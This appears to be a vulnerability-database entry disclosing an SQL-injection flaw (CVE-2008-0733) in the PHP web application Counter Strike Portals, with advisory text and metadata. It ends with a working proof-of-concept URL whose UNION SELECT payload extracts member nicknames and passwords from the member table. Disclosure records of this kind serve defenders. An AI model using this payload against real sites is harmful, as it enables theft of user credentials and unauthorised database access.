[] NeoSense

Counter Strike Portals - 'download' SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-02-12 
date_updated: 2014-01-23 
verified: 1 
codes: CVE-2008-0733;OSVDB-41578 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/27747/info

Counter Strike Portals is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/*